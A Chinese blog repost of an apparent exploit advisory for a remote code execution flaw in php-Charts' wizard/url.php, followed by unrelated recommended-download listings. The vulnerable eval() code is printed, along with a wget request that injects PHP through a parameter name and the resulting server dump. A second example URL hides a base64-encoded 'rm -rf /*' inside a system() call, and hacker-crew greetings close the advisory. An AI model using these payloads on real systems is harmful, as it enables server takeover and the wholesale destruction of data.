webchart= php 解码,php-Charts 'url.php'任意PHP代码执行漏洞

于 2021-03-31 19:27:39 发布
阅读量96 收藏
点赞数
文章标签: webchart= php 解码

root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php

<?php

require("../lib/phpchart.class.php");

$color_var=array("txt_col","line_col","bg_color");

$cname=$_GET["type"];

$chart=new PHPChart($cname);

foreach($_GET as $key=>$value)

{

if($value!="")

{

if(in_array($key,$color_var))

eval('$chart->'.$key.'="#'.$value.'";');

else if($value=='yes')

eval('$chart->'.$key.'=true;');

else if($value=='no')

eval('$chart->'.$key.'=false;');

else if(is_numeric($value))

eval('$chart->'.$key.'='.$value.';');

else

eval('$chart->'.$key."='".$value."';");

}

}

$chart->genChart();

Exploitation:

root@debian:/tmp# wget 'http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt

--2013-01-15 21:19:16-- http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY

Resolving hacker1.own... 127.0.0.1

Connecting to hacker1.own|127.0.0.1|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/html]

Saving to: “out.txt”

[ <=> ] 1,917 --.-K/s in 0s

2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]

Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4

array(28) {

["DOCUMENT_ROOT"]=>

string(28) "/etc/apache2/htdocs/hacker1/"

["GATEWAY_INTERFACE"]=>

string(7) "CGI/1.1"

["HTTP_ACCEPT"]=>

string(3) "*/*"

["HTTP_CLIENT_IP"]=>

string(9) "127.0.0.1"

["HTTP_HOST"]=>

string(11) "hacker1.own"

["HTTP_USER_AGENT"]=>

string(21) "Wget/1.12 (linux-gnu)"

["HTTP_VIA"]=>

string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"

["HTTP_X_FORWARDED_FOR"]=>

string(9) "127.0.0.1"

["PATH"]=>

string(4) "/bin"

["PHPRC"]=>

string(14) "/etc/php5/cgi/"

["QUERY_STRING"]=>

string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"

["REDIRECT_STATUS"]=>

string(3) "200"

["REMOTE_ADDR"]=>

string(9) "127.0.0.1"

["REMOTE_PORT"]=>

string(5) "60830"

["REQUEST_METHOD"]=>

string(3) "GET"

["REQUEST_URI"]=>

string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"

["SCRIPT_FILENAME"]=>

string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"

["SCRIPT_NAME"]=>

string(30) "/wp/chart/chart/wizard/url.php"

["SERVER_ADDR"]=>

string(9) "127.0.0.1"

["SERVER_ADMIN"]=>

string(21) "webmaster@hacker1.own"

["SERVER_NAME"]=>

string(11) "hacker1.own"

["SERVER_PORT"]=>

string(2) "80"

["SERVER_PROTOCOL"]=>

string(8) "HTTP/1.1"

["SERVER_SIGNATURE"]=>

string(0) ""

["SERVER_SOFTWARE"]=>

string(6) "Apache"

["UNIQUE_ID"]=>

string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"

["PHP_SELF"]=>

string(30) "/wp/chart/chart/wizard/url.php"

["REQUEST_TIME"]=>

int(1358302756)

}

Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1

Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1

root@debian:/tmp#

Example 2:

http://hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL

=====================ENDS HERE============================

================================================

KUDOSSSSSSS

================================================

packetstormsecurity.org

packetstormsecurity.com

packetstormsecurity.net

securityfocus.com

cxsecurity.com

security.nnov.ru

securtiyvulns.com

securitylab.ru

secunia.com

securityhome.eu

exploitsdownload.com

osvdb.com

websecurity.com.ua

1337day.com

to all Aa Team + to all Azerbaijan Black HatZ

+ *Especially to my bro CAMOUFL4G3 *

To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

================================================

/AkaStep

浪斌
关注
qtcharts-opensource-src-5.7.0.zip
04-28
在“qtcharts-opensource-src-5.7.0.zip”这个压缩包中,包含的是QtCharts开源源代码的5.7.0版本。这个版本是Qt框架的一个重要组成部分,它允许开发者创建丰富的、交互式的图形用户界面,特别是对于那些需要显示和...
在 Angular 中使用Chart.js 和 ng2-charts的示例代码
10-19
在Angular开发过程中,为了创建美观的数据可视化,开发者经常会选择集成第三方库如Chart.js。Chart.js是一个轻量级的JavaScript库,能快速生成各种类型的图表,包括柱状图、线图、饼图等。而ng2-charts是专为Angular...
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 13万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
经典ASP代码大集合
weixin_30518397的博客
07-28 2614
1. oncontextmenu="window.event.returnvalue=false" 将彻底屏蔽鼠标右键<table border oncontextmenu=return(false)><td>no</table> 可用于Table 2. <body onselectstart="return false"> 取消选取、防止复制 3...
C/C++ 开源库及示例代码
架构师的成长之路的博客
05-22 1655
C/C++ 开源库及示例代码Table of Contents说明1 综合性的库2 数据结构 &amp; 算法2.1 容器2.1.1 标准容器2.1.2 Lockfree 的容器2.1.3 环形缓冲2.1.4 多维数组2.1.5 图2.2 对容器的操作2.3 字符串处理2.3.1 字符集2.3.2 字符串格式化2.3.3 正则表达式2.3.4 (其它)2.4 内存相关2.4.1 智能指针2.4.2...
Snort 安装指南(Windows2003平台)
weixin_33782386的博客
09-03 171
***检测系统(IDS)是对计算机和网络系统资源上的恶意使用行为进行识别和响应的处理系统,它像雷达警戒一样,在不影响网络性能的前提下,对网络进行警戒、检测,从计算机网络的若干关键点收集 信息,通过分析这些信息,查看网络中是否有违反安全策略的行为和遭到***的迹象,从而扩展了系统管理员的安全管理能力,提高了信息安全基础结构的完整性。一般来说,IDS是作为防火墙的补充,...
XCL-Charts-master.zip_Android-Charts_XCL-Charts_android_java中xch
09-19
这个压缩包 "XCL-Charts-master.zip" 包含了 XCL-Charts 的源代码,提供了一个详细的学习和参考示例,帮助开发者理解和运用这个库。** ### XCL-Charts 库概述 XCL-Charts 提供了一系列用于绘制不同类型的图表的类,...
PyPI 官网下载 | django-admin-charts-0.15.0.tar.gz
01-10
**PyPI 官网下载 | django-admin-charts-0.15.0.tar.gz** `django-admin-charts-0.15.0.tar.gz` 是一个在Python Package Index(PyPI)官网上发布的软件包,它属于Python生态系统中的一个库。PyPI是Python开发者...
charts-docker-swarm-19.12.2.yml
12-01
mongodb-chart必备配置文件
解除劳动合同五大热点问题及裁员概述.ppt
09-14
解除劳动合同五大热点问题及裁员概述.ppt
暴风TV 43X-45X-50X-55X、43B2-50B2-55B2升级程序
09-14
暴风TV 43X-45X-50X-55X、43B2-50B2-55B2升级程序 暴风 Amlogic T866-H平台 1.0.42版本 本地升级: 1、将本地升级软件包“update”拷贝至U盘里,插入电视USB端口,打开电视进入系统设置选择本地升级。 2、选择本地升级,遥控点击确认,主板检测到U盘里面的软件进行升级,如下图所示。 3、首先效验软件,若软件不对或者软件未完整下载会导致效验失败,效验成功后如下图所示。 4、升级过程中会擦除以前的数据烧录新的软件后重启系统,整个过程大约3-5分钟,切勿断电或拔掉U盘。 升级完成后可以在系统设置——本机信息——查询软件版本更新状态 注意: 1、U盘要求使用FAT32格式,建议4G-8G的品牌U盘,刷机成功率会高 2、升级到结束,大约需要8-30分钟,中途绝对不能断电 3、升级重启第一次进入系统,请等完全正常进入开机桌面之后,才能拨下U盘
基于Springboot和Mysql的中小企业设备管理系统代码,包括程序,中文注释,配置说明操作步骤
09-14
中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统-中小企业设备管理系统 1、资源说明:中小企业设备管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows
暴风电视刷机数据 43X-45X-50X-55X、43B2-50B2-55B2升级程序 1.045版本
09-14
暴风TV 43X-45X-50X-55X、43B2-50B2-55B2升级程序 暴风 Amlogic T866-H平台 1.0.45版本 本地升级: 1、将本地升级软件包“update”拷贝至U盘里,插入电视USB端口,打开电视进入系统设置选择本地升级。 2、选择本地升级,遥控点击确认,主板检测到U盘里面的软件进行升级,如下图所示。 3、首先效验软件,若软件不对或者软件未完整下载会导致效验失败,效验成功后如下图所示。 4、升级过程中会擦除以前的数据烧录新的软件后重启系统,整个过程大约3-5分钟,切勿断电或拔掉U盘。 升级完成后可以在系统设置——本机信息——查询软件版本更新状态 注意: 1、U盘要求使用FAT32格式,建议4G-8G的品牌U盘,刷机成功率会高 2、升级到结束,大约需要8-30分钟,中途绝对不能断电 3、升级重启第一次进入系统,请等完全正常进入开机桌面之后,才能拨下U盘
exv20240812.msg
09-14
exv20240812.msg
基于Docker的在线Java实验平台(毕业设计).zip
09-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
基于ssm的企业培训管理系统设计与实现.docx
09-14
基于ssm的企业培训管理系统设计与实现.docx
基于ssm的高校学生比赛活动信息系统设计与实现.docx
最新发布
09-14
基于ssm的高校学生比赛活动信息系统设计与实现.docx
基于JavaScript实现微信小程序音乐播放器源代码+文档说明(期末大作业&毕业设计)
09-14
基于JavaScript实现微信小程序音乐播放器源代码+文档说明(期末大作业&毕业设计),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于JavaScript实现微信小程序音乐播放器源代码+文档说明(期末大作业&毕业设计),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于JavaScript实现微信小程序音乐播放器源代码+文档说明(期末大作业&毕业设计),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。基于JavaScript实现微信小程序音乐播
PHP实现折线图的步骤与代码详解
PHP中实现折线图效果的代码示例涉及到一个名为`ImageReport`的类,它...此外,如果要在PHP中生成更复杂的折线图,可能需要借助外部库,如GD库或者更高级的图表生成工具,如Chart.js、Google Charts或Highcharts等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值